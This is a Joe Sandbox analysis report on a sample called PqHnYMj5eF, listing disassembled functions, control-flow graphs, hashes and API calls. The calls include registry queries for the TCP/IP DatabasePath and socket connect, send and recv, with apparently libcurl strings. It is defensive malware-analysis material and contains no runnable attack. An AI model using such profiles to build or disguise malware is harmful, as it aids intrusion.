                                                • Opcode ID: 4cb2aab865a51aa71afa127a35c871797e45222cb840556ce623ae1f99adebff
                                                • Instruction ID: 387afc3a33229b9009a505e00ce4140aac85a9b3300e6951e5edb1c7e19efb68
                                                • Opcode Fuzzy Hash: 4cb2aab865a51aa71afa127a35c871797e45222cb840556ce623ae1f99adebff
                                                • Instruction Fuzzy Hash: 2562F5B1504745ABE722CF14C846FBBB7E4AF90304F054929FA8C9B292E771A845CB93
                                                Function 00489740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 944 489740-48975b 945 48975d-489768 call 4878a0 944->945 946 489780-489782 944->946 953 4899bb-4899c0 945->953 954 48976e-489770 945->954 948 489788-4897a0 call 748e00 call 4878a0 946->948 949 489914-48994e call 748b70 RegOpenKeyExA 946->949 948->953 958 4897a6-4897c5 948->958 961 48995a-489992 RegQueryValueExA RegCloseKey call 748b98 949->961 962 489950-489955 949->962 959 489a0c-489a15 953->959 957 489772-48977e 954->957 954->958 957->948 968 489827-489833 958->968 969 4897c7-4897e0 958->969 972 489997-4899b5 call 4878a0 961->972 962->959 973 48985f-489872 call 485ca0 968->973 974 489835-48985c call 47e2b0 * 2 968->974 970 4897e2-4897f3 call 748b50 969->970 971 4897f6-489809 969->971 970->971 971->968 983 48980b-489810 971->983 972->953 972->958 984 489878-48987d call 4877b0 973->984 985 4899f0 973->985 974->973 983->968 988 489812-489822 983->988 993 489882-489889 984->993 987 4899f5-4899fb call 485d00 985->987 998 4899fe-489a09 987->998 988->959 993->987 997 48988f-48989b call 474fe0 993->997 997->985 1003 4898a1-4898c3 call 748b50 call 4878a0 997->1003 998->959 1008 4898c9-4898db call 47e2d0 1003->1008 1009 4899c2-4899ed call 47e2b0 * 2 1003->1009 1008->1009 1013 4898e1-4898f0 call 47e2d0 1008->1013 1009->985 1013->1009 1019 4898f6-489905 call 4863f0 1013->1019 1024 48990b-48990f 1019->1024 1025 489f66-489f7f call 485d00 1019->1025 1027 489a3f-489a5a call 486740 call 4863f0 1024->1027 1025->998 1027->1025 1033 489a60-489a6e call 486d60 1027->1033 1036 489a1f-489a39 call 486840 call 4863f0 1033->1036 1037 489a70-489a94 call 486200 call 4867e0 call 486320 1033->1037 1036->1025 1036->1027 1048 489a16-489a19 1037->1048 1049 489a96-489ac6 call 47d120 1037->1049 1048->1036 1050 489fc1 1048->1050 1054 489ac8-489adb call 47d120 1049->1054 1055 489ae1-489af7 call 47d190 1049->1055 1053 489fc5-489ffd call 485d00 call 47e2b0 * 2 1050->1053 1053->998 1054->1036 1054->1055 1055->1036 1062 489afd-489b09 call 474fe0 1055->1062 1062->1050 1069 489b0f-489b29 call 47e730 1062->1069 1074 489b2f-489b3a call 4878a0 1069->1074 1075 489f84-489f88 1069->1075 1074->1075 1081 489b40-489b54 call 47e760 1074->1081 1076 489f95-489f99 1075->1076 1078 489f9b-489f9e 1076->1078 1079 489fa0-489fb6 call 47ebf0 * 2 1076->1079 1078->1050 1078->1079 1091 489fb7-489fbe 1079->1091 1087 489f8a-489f92 1081->1087 1088 489b5a-489b6e call 47e730 1081->1088 1087->1076 1094 489b8c-489b97 call 4863f0 1088->1094 1095 489b70-48a004 1088->1095 1091->1050 1103 489c9a-489cab call 47ea00 1094->1103 1104 489b9d-489bbf call 486740 call 4863f0 1094->1104 1099 48a015-48a01d 1095->1099 1101 48a01f-48a022 1099->1101 1102 48a024-48a045 call 47ebf0 * 2 1099->1102 1101->1053 1101->1102 1102->1053 1112 489f31-489f35 1103->1112 1113 489cb1-489ccd call 47ea00 call 47e960 1103->1113 1104->1103 1121 489bc5-489bda call 486d60 1104->1121 1117 489f40-489f61 call 47ebf0 * 2 1112->1117 1118 489f37-489f3a 1112->1118 1132 489cfd-489d0e call 47e960 1113->1132 1133 489ccf 1113->1133 1117->1036 1118->1036 1118->1117 1121->1103 1131 489be0-489bf4 call 486200 call 4867e0 1121->1131 1131->1103 1152 489bfa-489c0b call 486320 1131->1152 1141 489d10 1132->1141 1142 489d53-489d55 1132->1142 1136 489cd1-489cec call 47e9f0 call 47e4a0 1133->1136 1153 489cee-489cfb call 47e9d0 1136->1153 1154 489d47-489d51 1136->1154 1146 489d12-489d2d call 47e9f0 call 47e4a0 1141->1146 1145 489e69-489e8e call 47ea40 call 47e440 1142->1145 1169 489e90-489e92 1145->1169 1170 489e94-489eaa call 47e3c0 1145->1170 1173 489d5a-489d6f call 47e960 1146->1173 1174 489d2f-489d3c call 47e9d0 1146->1174 1167 489c11-489c1c call 487b70 1152->1167 1168 489b75-489b86 call 47ea00 1152->1168 1153->1132 1153->1136 1159 489dca-489ddb call 47e960 1154->1159 1179 489ddd-489ddf 1159->1179 1180 489e2e-489e36 1159->1180 1167->1094 1184 489c22-489c33 call 47e960 1167->1184 1168->1094 1190 489f2d 1168->1190 1177 489eb3-489ec4 call 47e9c0 1169->1177 1200 48a04a-48a04c 1170->1200 1201 489eb0-489eb1 1170->1201 1196 489d71-489d73 1173->1196 1197 489dc2 1173->1197 1174->1146 1193 489d3e-489d42 1174->1193 1177->1036 1209 489eca-489ed0 1177->1209 1189 489e06-489e21 call 47e9f0 call 47e4a0 1179->1189 1186 489e38-489e3b 1180->1186 1187 489e3d-489e5b call 47ebf0 * 2 1180->1187 1211 489c35 1184->1211 1212 489c66-489c75 call 4878a0 1184->1212 1186->1187 1198 489e5e-489e67 1186->1198 1187->1198 1227 489de1-489dee call 47ec80 1189->1227 1228 489e23-489e2c call 47eac0 1189->1228 1190->1112 1193->1145 1207 489d9a-489db5 call 47e9f0 call 47e4a0 1196->1207 1197->1159 1198->1145 1198->1177 1205 48a04e-48a051 1200->1205 1206 48a057-48a070 call 47ebf0 * 2 1200->1206 1201->1177 1205->1050 1205->1206 1206->1091 1241 489d75-489d82 call 47ec80 1207->1241 1242 489db7-489dc0 call 47eac0 1207->1242 1210 489ee5-489ef2 call 47e9f0 1209->1210 1210->1036 1233 489ef8-489f0e call 47e440 1210->1233 1218 489c37-489c51 call 47e9f0 1211->1218 1238 489c7b-489c8f call 47e7c0 1212->1238 1239 48a011 1212->1239 1218->1094 1257 489c57-489c64 call 47e9d0 1218->1257 1251 489df1-489e04 call 47e960 1227->1251 1228->1251 1255 489f10-489f26 call 47e3c0 1233->1255 1256 489ed2-489edf call 47e9e0 1233->1256 1238->1094 1252 489c95-48a00e 1238->1252 1239->1099 1261 489d85-489d98 call 47e960 1241->1261 1242->1261 1251->1180 1251->1189 1252->1239 1255->1256 1271 489f28 1255->1271 1256->1036 1256->1210 1257->1212 1257->1218 1261->1197 1261->1207 1271->1050
                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00489946
                                                • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00489974
                                                • RegCloseKey.KERNELBASE(?), ref: 0048998B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                • API String ID: 3677997916-615551945
                                                • Opcode ID: d2010e7d0c0e95569f905c3c35635a7d0b5626b98c2d6fa804c3d30e3dadc06c
                                                • Instruction ID: 429a40a5bd210a51fb0ac25eb084281daae17da9c8201b2dd877410b0e870ec2
                                                • Opcode Fuzzy Hash: d2010e7d0c0e95569f905c3c35635a7d0b5626b98c2d6fa804c3d30e3dadc06c
                                                • Instruction Fuzzy Hash: 1132B4F1900601ABE711BB22AC42A6F76D4AF4430CF08497AFD0D96362F729ED15C79B
                                                Function 003F8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1365 3f8b50-3f8b69 1366 3f8b6b-3f8b74 1365->1366 1367 3f8be6 1365->1367 1369 3f8beb-3f8bf2 1366->1369 1370 3f8b76-3f8b8d 1366->1370 1368 3f8be9 1367->1368 1368->1369 1371 3f8b8f-3f8ba7 call 3d6e40 1370->1371 1372 3f8bf3-3f8bfe call 3fa550 1370->1372 1379 3f8bad-3f8baf 1371->1379 1380 3f8cd9-3f8d16 SleepEx 1371->1380 1377 3f8de4-3f8def 1372->1377 1378 3f8c04-3f8c08 1372->1378 1383 3f8e8c-3f8e95 1377->1383 1384 3f8df5-3f8e19 call 3fa150 1377->1384 1381 3f8c0e-3f8c1d 1378->1381 1382 3f8dbd-3f8dc3 1378->1382 1385 3f8ca6-3f8cb0 1379->1385 1386 3f8bb5-3f8bb9 1379->1386 1397 3f8d18-3f8d20 1380->1397 1398 3f8d22 1380->1398 1391 3f8c1f-3f8c30 connect 1381->1391 1392 3f8c35-3f8c48 call 3fa150 1381->1392 1382->1368 1389 3f8e97-3f8e9c 1383->1389 1390 3f8f00-3f8f06 1383->1390 1421 3f8e1b-3f8e26 1384->1421 1422 3f8e88 1384->1422 1385->1380 1393 3f8cb2-3f8cb8 1385->1393 1386->1369 1387 3f8bbb-3f8bc2 1386->1387 1387->1369 1396 3f8bc4-3f8bcc 1387->1396 1399 3f8edf-3f8eef call 3c78b0 1389->1399 1400 3f8e9e-3f8eb6 call 3d2a00 1389->1400 1390->1369 1391->1392 1420 3f8c4d-3f8c4f 1392->1420 1401 3f8cbe-3f8cd4 call 3fb180 1393->1401 1402 3f8ddc-3f8dde 1393->1402 1405 3f8bce-3f8bd2 1396->1405 1406 3f8bd4-3f8bda 1396->1406 1408 3f8d26-3f8d39 1397->1408 1398->1408 1424 3f8ef2-3f8efc 1399->1424 1400->1399 1419 3f8eb8-3f8edd call 3d3410 * 2 1400->1419 1401->1377 1402->1368 1402->1377 1405->1369 1405->1406 1406->1369 1413 3f8bdc-3f8be1 1406->1413 1416 3f8d3b-3f8d3d 1408->1416 1417 3f8d43-3f8d61 call 3dd8c0 call 3fa150 1408->1417 1423 3f8dac-3f8db8 call 4050a0 1413->1423 1416->1402 1416->1417 1444 3f8d66-3f8d74 1417->1444 1419->1424 1427 3f8c8e-3f8c93 1420->1427 1428 3f8c51-3f8c58 1420->1428 1429 3f8e2e-3f8e85 call 3dd090 call 404fd0 1421->1429 1430 3f8e28-3f8e2c 1421->1430 1422->1383 1423->1369 1424->1390 1437 3f8c99-3f8c9f 1427->1437 1438 3f8dc8-3f8dd9 call 3fb100 1427->1438 1428->1427 1434 3f8c5a-3f8c62 1428->1434 1429->1422 1430->1422 1430->1429 1440 3f8c6a-3f8c70 1434->1440 1441 3f8c64-3f8c68 1434->1441 1437->1385 1438->1402 1440->1427 1447 3f8c72-3f8c8b call 4050a0 1440->1447 1441->1427 1441->1440 1444->1369 1445 3f8d7a-3f8d81 1444->1445 1445->1369 1450 3f8d87-3f8d8f 1445->1450 1447->1427 1454 3f8d9b-3f8da1 1450->1454 1455 3f8d91-3f8d95 1450->1455 1454->1369 1458 3f8da7 1454->1458 1455->1369 1455->1454 1458->1423
                                                APIs
                                                • connect.WS2_32(?,?,00000001), ref: 003F8C30
                                                • SleepEx.KERNELBASE(00000000,00000000), ref: 003F8CF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: Sleepconnect
                                                • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                • API String ID: 238548546-879669977
                                                • Opcode ID: 061c543ada707d08811388f6eee3bded43290217ed06a128916daf9fb5f06cfc
                                                • Instruction ID: 9531e2ee062d65ee6d1a641e90482c54f915689de83cbe4a10eeecc6a91aeeba
                                                • Opcode Fuzzy Hash: 061c543ada707d08811388f6eee3bded43290217ed06a128916daf9fb5f06cfc
                                                • Instruction Fuzzy Hash: 76B1CF7060430AAFDB1ACF24C985BB7B7E4AF55318F048929FA594B2D2DB74EC48C761
                                                Function 003C2F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1459 3c2f17-3c2f8c call 8498f0 call 849ce0 1464 3c31c9-3c31cd 1459->1464 1465 3c2f91-3c2ff4 call 3c1619 RegOpenKeyExA 1464->1465 1466 3c31d3-3c31d6 1464->1466 1469 3c2ffa-3c300b 1465->1469 1470 3c31c5 1465->1470 1471 3c315c-3c31ac RegEnumKeyExA 1469->1471 1470->1464 1472 3c3010-3c3083 call 3c1619 RegOpenKeyExA 1471->1472 1473 3c31b2-3c31c2 1471->1473 1477 3c314e-3c3152 1472->1477 1478 3c3089-3c30d4 RegQueryValueExA 1472->1478 1473->1470 1477->1471 1479 3c313b-3c314b RegCloseKey 1478->1479 1480 3c30d6-3c3137 call 849bc0 call 849c50 call 849ce0 call 849af0 call 849ce0 call 848050 1478->1480 1479->1477 1480->1479
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: EnumOpen
                                                • String ID: d
                                                • API String ID: 3231578192-2564639436
                                                • Opcode ID: 97ddeddc2625aa5812c746a1e4e0bec520c61de86c92aba5b4c89b7cd4b2f423
                                                • Instruction ID: b98cf5dfb6039da6dc98c7a74e53b316fb75d519af4ed1ec84b2f13a48fe9b01
                                                • Opcode Fuzzy Hash: 97ddeddc2625aa5812c746a1e4e0bec520c61de86c92aba5b4c89b7cd4b2f423
                                                • Instruction Fuzzy Hash: CC7181B49043199FDB50EF69D58879EBBF0BF84308F10886DE89897311D7749A898F92
                                                Function 003C76A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1493 3c76a0-3c76be 1494 3c76e6-3c76f2 send 1493->1494 1495 3c76c0-3c76c7 1493->1495 1497 3c775e-3c7762 1494->1497 1498 3c76f4-3c7709 call 3c72a0 1494->1498 1495->1494 1496 3c76c9-3c76d1 1495->1496 1499 3c770b-3c7759 call 3c72a0 call 3ccb20 call 748c50 1496->1499 1500 3c76d3-3c76e4 1496->1500 1498->1497 1499->1497 1500->1498
                                                APIs
                                                • send.WS2_32(multi.c,?,?,?,N=<,00000000,?,?,003D07BF), ref: 003C76EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: send
                                                • String ID: LIMIT %s:%d %s reached memlimit$N=<$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                • API String ID: 2809346765-2027368032
                                                • Opcode ID: 333e2ead38cac446e051ab1381a61f951015a755a54e44145806e799df3cd1d0
                                                • Instruction ID: 2b592876dfc0ca2a400c18f71dc3e8350aaab91872d978283748776d83d64aa0
                                                • Opcode Fuzzy Hash: 333e2ead38cac446e051ab1381a61f951015a755a54e44145806e799df3cd1d0
                                                • Instruction Fuzzy Hash: 44113DB5F193147BD121A75A9C4AF27776CDBC2B6CF05091CBC0497242D6619D018BB1
                                                Function 003F9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1612 3f9290-3f92ed call 3c76a0 1615 3f93c3-3f93ce 1612->1615 1616 3f92f3-3f92fb 1612->1616 1623 3f93e5-3f9427 call 3dd090 call 404f40 1615->1623 1624 3f93d0-3f93e1 1615->1624 1617 3f93aa-3f93af 1616->1617 1618 3f9301-3f9333 call 3dd8c0 call 3dd9a0 1616->1618 1621 3f9456-3f9470 1617->1621 1622 3f93b5-3f93bc 1617->1622 1636 3f93a7 1618->1636 1637 3f9335-3f9364 WSAIoctl 1618->1637 1626 3f93be 1622->1626 1627 3f9429-3f9431 1622->1627 1623->1621 1623->1627 1624->1622 1628 3f93e3 1624->1628 1626->1621 1631 3f9439-3f943f 1627->1631 1632 3f9433-3f9437 1627->1632 1628->1621 1631->1621 1635 3f9441-3f9453 call 4050a0 1631->1635 1632->1621 1632->1631 1635->1621 1636->1617 1640 3f939b-3f93a4 1637->1640 1641 3f9366-3f936f 1637->1641 1640->1636 1641->1640 1644 3f9371-3f9390 setsockopt 1641->1644 1644->1640 1645 3f9392-3f9395 1644->1645 1645->1640
                                                APIs
                                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 003F935D
                                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 003F9389
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: Ioctlsetsockopt
                                                • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                • API String ID: 1903391676-2691795271
                                                • Opcode ID: 69e22b4c7721b4b05b90d55fb67736647a9eef1485404d3d5a78cbd91d6c3a18
                                                • Instruction ID: c4a9ae4de9d53716c8d4d019bd1f5978aab11706766e8222c214350661e37a35
                                                • Opcode Fuzzy Hash: 69e22b4c7721b4b05b90d55fb67736647a9eef1485404d3d5a78cbd91d6c3a18
                                                • Instruction Fuzzy Hash: EA51E575A00309AFD712DF25C881FBA77A5FF84314F15852AFE489B282EB31E951CB51
                                                Function 003C7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1646 3c7770-3c778e 1647 3c77b6-3c77c2 recv 1646->1647 1648 3c7790-3c7797 1646->1648 1650 3c782e-3c7832 1647->1650 1651 3c77c4-3c77d9 call 3c72a0 1647->1651 1648->1647 1649 3c7799-3c77a1 1648->1649 1652 3c77db-3c7829 call 3c72a0 call 3ccb20 call 748c50 1649->1652 1653 3c77a3-3c77b4 1649->1653 1651->1650 1652->1650 1653->1651
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: recv
                                                • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                • API String ID: 1507349165-640788491
                                                • Opcode ID: 1ac98d430172417943b38d9d1c84cb66c8838a6355e32f478b12eb5c7c1e4dde
                                                • Instruction ID: d33ef53256f84eec3550443b297b9a7312e2f8be9abe6a4ab9510e52757ccc65
